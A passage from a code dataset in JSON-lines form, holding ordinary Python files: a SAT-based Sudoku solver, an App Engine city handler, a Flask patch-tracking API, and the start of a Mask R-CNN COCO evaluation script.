"wtforms.validators.DataRequired", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.BooleanField", "line_number": 41, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 42, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 47, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 47, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 48, "usage_type": "argument"}, {"api_name": "data.db_session.global_init", "line_number": 52, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 58, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 64, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 64, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 65, "usage_type": "argument"}, {"api_name": "flask.request.method", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 68, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 78, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 78, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.session.query", "line_number": 79, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 79, "usage_type": "argument"}, {"api_name": "flask.session", "line_number": 79, "usage_type": "name"}, {"api_name": "data.users.User.email", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask_login.login_user", "line_number": 81, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "flask_login.logout_user", "line_number": 92, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 104, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 104, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.session.query", "line_number": 105, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 105, "usage_type": "argument"}, {"api_name": "flask.session", 
"line_number": 105, "usage_type": "name"}, {"api_name": "data.users.User.email", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.session.add", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.session.commit", "line_number": 115, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 115, "usage_type": "name"}, {"api_name": "werkzeug.utils.redirect", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 117, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 122, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 122, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 123, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 123, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 124, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 129, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 129, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 130, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 133, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 136, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 164, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 166, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 171, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 171, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 172, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 173, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 173, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 175, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 175, "usage_type": "name"}, {"api_name": "data.orders.Orders", "line_number": 176, "usage_type": "argument"}, {"api_name": "data.orders.Orders.id", "line_number": 176, "usage_type": "attribute"}, {"api_name": "data.goods.Goods", "line_number": 177, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 177, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 180, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 202, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 205, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 205, "usage_type": "name"}, {"api_name": "data.orders.Orders", "line_number": 206, "usage_type": 
"argument"}, {"api_name": "flask.render_template", "line_number": 209, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 216, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 218, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 220, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 225, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 233, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 233, "usage_type": "name"}, {"api_name": "data.orders.Orders", "line_number": 234, "usage_type": "argument"}, {"api_name": "data.goods.Goods", "line_number": 235, "usage_type": "argument"}, {"api_name": "sqlite3.connect", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 248, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 256, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 265, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 270, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 271, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.request.cookies.get", "line_number": 278, "usage_type": "call"}, {"api_name": "flask.request.cookies", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 280, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 284, "usage_type": "call"}]}
+{"seq_id": "439810512", "text": "import pycosat\n\n## Hard coded sudoku dimensions\nN = 9\nM = 3\n\n\ndef getAllValidMoves(x0, y0):\n \"\"\"Get all valid knight's moves from location x0, y0 on the 9x9 sudoku grid.\"\"\"\n deltas = [\n (-2, -1),\n (-2, +1),\n (+2, -1),\n (+2, +1),\n (-1, -2),\n (-1, +2),\n (+1, -2),\n (+1, +2),\n ]\n validPositions = []\n\n for (x, y) in deltas:\n xCandidate = x0 + x\n yCandidate = y0 + y\n if 0 < xCandidate < 8 and 0 < yCandidate < 8:\n validPositions.append([xCandidate, yCandidate])\n\n return validPositions\n\n\ndef exactly_one_knights_move(variables):\n \"\"\"Check that no cells share the same value as a specific cell when they're a knight's move away.\"\"\"\n cnf = []\n\n for valid_move in variables[:-1]:\n # print(valid_move)\n cnf.append([-valid_move, -variables[-1]])\n\n return cnf\n\n\ndef exactly_one(variables):\n \"\"\"Check that all cells in 'variales' have unique values.\"\"\"\n cnf = [variables]\n n = len(variables)\n\n for i in range(n):\n for j in range(i + 1, n):\n v1 = variables[i]\n v2 = variables[j]\n cnf.append([-v1, -v2])\n\n return cnf\n\n\ndef transform(i, j, k):\n \"\"\"Transform the cell X(i, j, k) into an integer for conversion to CNF.\"\"\"\n return i * N * N + j * N + k + 1\n\n\ndef inverse_transform(v):\n \"\"\"Convert the integer back into i, j, k values.\"\"\"\n v, k = divmod(v - 1, N)\n v, j = divmod(v, N)\n v, i = divmod(v, N)\n return i, j, k\n\n\nwhile True:\n if __name__ == \"__main__\":\n solver_select = input(\n \"What type of sudoku would you like to solve? Options are:\\nClassic\\nDiagonal\\nAnti-Knight\\nMagic Square\\n\"\n )\n cnf = []\n\n # Cell, row and column constraints\n for x in range(N):\n for s in range(N):\n cnf = cnf + exactly_one([transform(x, y, s) for y in range(N)])\n cnf = cnf + exactly_one([transform(y, x, s) for y in range(N)])\n for y in range(N):\n cnf = cnf + exactly_one([transform(x, y, k) for k in range(N)])\n\n # Sub-matrix constraints\n for k in range(N):\n for x in range(M):\n for y in range(M):\n v = [\n transform(y * M + i, x * M + j, k)\n for i in range(M)\n for j in range(M)\n ]\n cnf = cnf + exactly_one(v)\n\n if solver_select.lower() == \"classic\":\n pass\n elif solver_select.lower() == \"diagonal\":\n # Diagonal constraints\n for s in range(N):\n cnf = cnf + exactly_one(\n [transform(x, N - (x + 1), s) for x in range(N)]\n )\n cnf = cnf + exactly_one([transform(x, x, s) for x in range(N)])\n elif solver_select.lower() == \"anti-knight\":\n # Knight's move contraints\n for s in range(N):\n for x in range(N):\n for y in range(N):\n valid_moves = getAllValidMoves(x, y)\n valid_moves.append([x, y])\n cnf = cnf + exactly_one_knights_move(\n [transform(x, y, s) for x, y in valid_moves]\n )\n else:\n print(\"You gave an undefined sudoku type, please try again\")\n break\n\n # cnf = {frozenset(x) for x in cnf}\n # cnf = list(cnf)\n\n # A 16-constraint Sudoku\n # constraints = [\n # (0, 3, 7),\n # (2, 3, 4),\n # (2, 4, 3),\n # (2, 6, 2),\n # (3, 8, 6),\n # (4, 3, 5),\n # (4, 5, 9),\n # (5, 6, 4),\n # (5, 7, 1),\n # (5, 8, 8),\n # (6, 4, 8),\n # (6, 5, 1),\n # (7, 2, 2),\n # (7, 7, 5),\n # (8, 1, 4),\n # (8, 6, 3),\n # ]\n\n # Knight's move, diagonal, magic square sudoku\n constraints = [\n # (8, 8, 2),\n # (3, 0, 3),\n # (3, 1, 8),\n # (3, 2, 4),\n # # Magic square hardcoded\n # (3, 3, 6),\n # (3, 4, 7),\n # (3, 5, 2),\n # (4, 3, 1),\n # (4, 4, 5),\n # (4, 5, 9),\n ]\n\n cnf = cnf + [[transform(z[0], z[1], z[2]) - 1] for z in constraints]\n\n ## Outputs all valid sudoku solutions.\n for 
solution in pycosat.itersolve(cnf):\n X = [inverse_transform(v) for v in solution if v > 0]\n for i, cell in enumerate(sorted(X, key=lambda h: h[0] * N * N + h[1] * N)):\n print(cell[2] + 1, end=\" \")\n if (i + 1) % N == 0:\n print(\"\")\n print(\"\\n-----------------\\n\")\n", "sub_path": "Sudoku.py", "file_name": "Sudoku.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pycosat.itersolve", "line_number": 159, "usage_type": "call"}]}
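Sudoku.py above flattens each cell/value proposition X(i, j, k) into a single positive integer so the clauses can be handed to a DIMACS-style SAT solver. The round trip of that encoding, and the pairwise at-most-one clauses, can be checked without pycosat; this standalone sketch mirrors the record's functions:

N = 9

def transform(i, j, k):
    # Same encoding as Sudoku.py: 1-based variable id for cell (i, j) holding value k.
    return i * N * N + j * N + k + 1

def inverse_transform(v):
    v, k = divmod(v - 1, N)
    v, j = divmod(v, N)
    v, i = divmod(v, N)
    return i, j, k

# The round trip holds for every (i, j, k) triple.
assert all(
    inverse_transform(transform(i, j, k)) == (i, j, k)
    for i in range(N) for j in range(N) for k in range(N)
)

def exactly_one(variables):
    # One clause demanding that some variable is true, plus pairwise exclusions.
    cnf = [list(variables)]
    for a in range(len(variables)):
        for b in range(a + 1, len(variables)):
            cnf.append([-variables[a], -variables[b]])
    return cnf

print(exactly_one([1, 2, 3]))  # [[1, 2, 3], [-1, -2], [-1, -3], [-2, -3]]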
+{"seq_id": "130929224", "text": "from google.appengine.ext import ndb\n\nfrom guestbook.models import City\nfrom guestbook.services import Handler\nfrom guestbook.services.school import SchoolHandler\n\n\nclass CityHandler(Handler):\n model = City\n\n def get_schools(self):\n schools = getattr(self.obj, 'schools', None)\n if schools is not None:\n return SchoolHandler(schools).serializer\n\n def update_school(self, data):\n if 'schools' not in data:\n return data\n\n schools = data.pop('schools', None)\n\n id_school = schools.pop('id')\n handler = SchoolHandler(_id=int(id_school))\n handler.update(schools)\n data['schools'] = handler.serializer\n return data\n\n @ndb.transactional(xg=True)\n def update(self, data):\n updated_data = self.update_school(data)\n self.obj.update(**updated_data)\n\n def create_school(self, data):\n schools = data.pop('schools', None)\n handler = SchoolHandler(_id=schools)\n\n data['schools'] = handler.obj\n return data\n\n @ndb.transactional(xg=True)\n def create(self, data):\n modified_data = self.create_school(data)\n entity = self.model(**modified_data)\n entity.put()\n self.obj = entity\n return CityHandler(entity)\n", "sub_path": "guestbook/services/city.py", "file_name": "city.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "guestbook.services.Handler", "line_number": 8, "usage_type": "name"}, {"api_name": "guestbook.models.City", "line_number": 9, "usage_type": "name"}, {"api_name": "guestbook.services.school.SchoolHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "guestbook.services.school.SchoolHandler", "line_number": 23, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.transactional", "line_number": 28, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 28, "usage_type": "name"}, {"api_name": "guestbook.services.school.SchoolHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.transactional", "line_number": 40, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 40, "usage_type": "name"}]}
+{"seq_id": "66196206", "text": "\"\"\"\nmodule of issue API\n\"\"\"\nimport logging\nfrom flask import request, Blueprint\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom patch_tracking.database.models import Tracking\nfrom patch_tracking.api.business import create_tracking, update_tracking, delete_tracking\nfrom patch_tracking.api.constant import ResponseCode\nfrom patch_tracking.api.auth import auth\n\nlogger = logging.getLogger(__name__)\ntracking = Blueprint('tracking', __name__)\n\n\n@tracking.route('', methods=[\"DELETE\"])\n@auth.login_required\ndef delete():\n \"\"\"\n Delete tracking(s).\n \"\"\"\n input_params = request.args\n keys = list(input_params.keys())\n\n param_error = False\n if not keys or \"repo\" not in keys:\n param_error = True\n\n if len(set(keys) - {\"repo\", \"branch\"}) != 0:\n param_error = True\n\n if param_error:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n try:\n if \"branch\" in keys:\n if Tracking.query.filter(Tracking.repo == input_params['repo'],\n Tracking.branch == input_params['branch']).first():\n delete_tracking(input_params['repo'], input_params['branch'])\n logger.info('Delete tracking repo: %s, branch: %s', input_params['repo'], input_params['branch'])\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS)\n\n logger.info('Delete tracking repo: %s, branch: %s not found.', input_params['repo'], input_params['branch'])\n return ResponseCode.ret_message(code=ResponseCode.DELETE_DB_NOT_FOUND)\n if Tracking.query.filter(Tracking.repo == input_params['repo']).first():\n delete_tracking(input_params['repo'])\n logger.info('Delete tracking repo: %s', input_params['repo'])\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS)\n\n logger.info('Delete tracking repo: %s not found.', input_params['repo'])\n return ResponseCode.ret_message(code=ResponseCode.DELETE_DB_NOT_FOUND)\n except SQLAlchemyError as err:\n return ResponseCode.ret_message(code=ResponseCode.DELETE_DB_ERROR, data=err)\n\n\n@tracking.route('', methods=[\"GET\"])\ndef get():\n \"\"\"\n Returns list of tracking\n \"\"\"\n if not request.args:\n trackings = Tracking.query.all()\n else:\n allowed_key = ['repo', 'branch', 'enabled']\n input_params = request.args\n\n data = dict()\n for k, param in input_params.items():\n if k in allowed_key:\n if k == 'enabled':\n param = bool(param == 'true')\n data[k] = param\n else:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n trackings = Tracking.query.filter_by(**data).all()\n\n resp_data = list()\n for item in trackings:\n resp_data.append(item.to_json())\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS, data=resp_data)\n\n\n@tracking.route('', methods=[\"POST\"])\n@auth.login_required\ndef post():\n \"\"\"\n Creates or update a tracking.\n \"\"\"\n required_params = ['version_control', 'scm_repo', 'scm_branch', 'scm_commit', 'repo', 'branch', 'enabled']\n input_params = request.json\n data = dict()\n for item in input_params:\n if item in required_params:\n data[item] = input_params[item]\n required_params.remove(item)\n else:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n if len(required_params) > 1 or (len(required_params) == 1 and required_params[0] != 'scm_commit'):\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n if data['version_control'] not in [\"github\", \"git\"]:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n track = Tracking.query.filter_by(repo=data['repo'], 
branch=data['branch']).first()\n if track:\n try:\n update_tracking(data)\n logger.info('Update tracking. Data: %s.', data)\n except SQLAlchemyError as err:\n return ResponseCode.ret_message(code=ResponseCode.INSERT_DATA_ERROR, data=err)\n else:\n try:\n create_tracking(data)\n logger.info('Create tracking. Data: %s.', data)\n except SQLAlchemyError as err:\n return ResponseCode.ret_message(code=ResponseCode.INSERT_DATA_ERROR, data=err)\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS, data=request.json)\n", "sub_path": "patch_tracking/api/tracking.py", "file_name": "tracking.py", "file_ext": "py", "file_size_in_byte": 4450, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.Blueprint", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 33, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 33, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 33, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 37, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 37, "usage_type": "name"}, {"api_name": "patch_tracking.database.models.Tracking.repo", "line_number": 37, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.branch", "line_number": 38, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 38, "usage_type": "name"}, {"api_name": "patch_tracking.api.business.delete_tracking", "line_number": 39, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 41, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 41, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 41, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 44, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 44, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.DELETE_DB_NOT_FOUND", "line_number": 44, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 45, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 45, "usage_type": "name"}, {"api_name": "patch_tracking.database.models.Tracking.repo", "line_number": 45, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.business.delete_tracking", "line_number": 46, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 48, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 48, "usage_type": "name"}, {"api_name": 
"patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 48, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 51, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 51, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.DELETE_DB_NOT_FOUND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 52, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 53, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 53, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.DELETE_DB_ERROR", "line_number": 53, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.auth.auth.login_required", "line_number": 17, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.auth.auth", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "patch_tracking.database.models.Tracking.query.all", "line_number": 62, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 62, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 74, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 74, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 74, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter_by", "line_number": 75, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 75, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 75, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 80, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 80, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 97, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 97, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 97, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 100, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 100, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 100, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", 
"line_number": 103, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 103, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INPUT_PARAMETERS_ERROR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking.query.filter_by", "line_number": 105, "usage_type": "call"}, {"api_name": "patch_tracking.database.models.Tracking.query", "line_number": 105, "usage_type": "attribute"}, {"api_name": "patch_tracking.database.models.Tracking", "line_number": 105, "usage_type": "name"}, {"api_name": "patch_tracking.api.business.update_tracking", "line_number": 108, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 110, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 111, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 111, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INSERT_DATA_ERROR", "line_number": 111, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.business.create_tracking", "line_number": 114, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 116, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 117, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 117, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.INSERT_DATA_ERROR", "line_number": 117, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.constant.ResponseCode.ret_message", "line_number": 118, "usage_type": "call"}, {"api_name": "patch_tracking.api.constant.ResponseCode", "line_number": 118, "usage_type": "name"}, {"api_name": "patch_tracking.api.constant.ResponseCode.SUCCESS", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request.json", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "patch_tracking.api.auth.auth.login_required", "line_number": 84, "usage_type": "attribute"}, {"api_name": "patch_tracking.api.auth.auth", "line_number": 84, "usage_type": "name"}]}
+{"seq_id": "604342291", "text": "import argparse\nimport os, sys, tempfile\nimport torch\n\nthis_dir = os.path.dirname(os.path.abspath(__file__))\nroot_dir = os.path.abspath(os.path.join(this_dir, '..', '..'))\nif root_dir not in sys.path:\n sys.path.insert(0, root_dir)\n\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data import make_data_loader\nfrom maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval import (\n check_expected_results,\n prepare_for_coco_detection,\n evaluate_box_proposals,\n evaluate_predictions_on_coco,\n COCOResults,\n)\nfrom maskrcnn_benchmark.utils.miscellaneous import mkdir\n\n\nparser = argparse.ArgumentParser(description=\"PyTorch Object Detection Eval\")\nparser.add_argument(\n \"--config-file\",\n default=\"/private/home/fmassa/github/detectron.pytorch_v2/configs/e2e_faster_rcnn_R_50_C4_1x_caffe2.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n)\nparser.add_argument(\"--local_rank\", type=int, default=0)\nparser.add_argument(\"--no-eval\", default=False, action=\"store_true\")\nparser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n)\n\nargs = parser.parse_args()\n\ncfg.merge_from_file(args.config_file)\ncfg.merge_from_list(args.opts)\ncfg.freeze()\n\ndata_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=False)\n\ndataset_names = cfg.DATASETS.TEST\noutput_folders = [None] * len(cfg.DATASETS.TEST)\nif cfg.OUTPUT_DIR:\n for idx, dataset_name in enumerate(dataset_names):\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\", dataset_name)\n mkdir(output_folder)\n output_folders[idx] = output_folder\n\nextra_args = dict(\n box_only=False,\n iou_types=(\"bbox\",),\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n)\n\npreds = torch.load(os.path.join(cfg.OUTPUT_DIR, \"inference\", \"tianchi_xray_eval_no_normal_bbox_in_coco\", \"predictions.pth\"))\n\n\ndef do_coco_evaluation(\n dataset,\n predictions,\n box_only,\n output_folder,\n iou_types,\n expected_results,\n expected_results_sigma_tol,\n):\n print(\"Preparing results for COCO format\")\n coco_results = {}\n if \"bbox\" in iou_types:\n print(\"Preparing bbox results\")\n coco_results[\"bbox\"] = prepare_for_coco_detection(predictions, dataset)\n\n results = COCOResults(*iou_types)\n print(\"Evaluating predictions\")\n for iou_type in iou_types:\n with tempfile.NamedTemporaryFile() as f:\n file_path = f.name\n if output_folder:\n file_path = os.path.join(output_folder, iou_type + \".json\")\n res = evaluate_predictions_on_coco(\n dataset.coco, coco_results[iou_type], file_path, iou_type\n )\n results.update(res)\n print(results)\n check_expected_results(results, expected_results, expected_results_sigma_tol)\n return results, coco_results\n\n\ndef preds_filter(preds, limit):\n cnt1 = 0\n cnt2 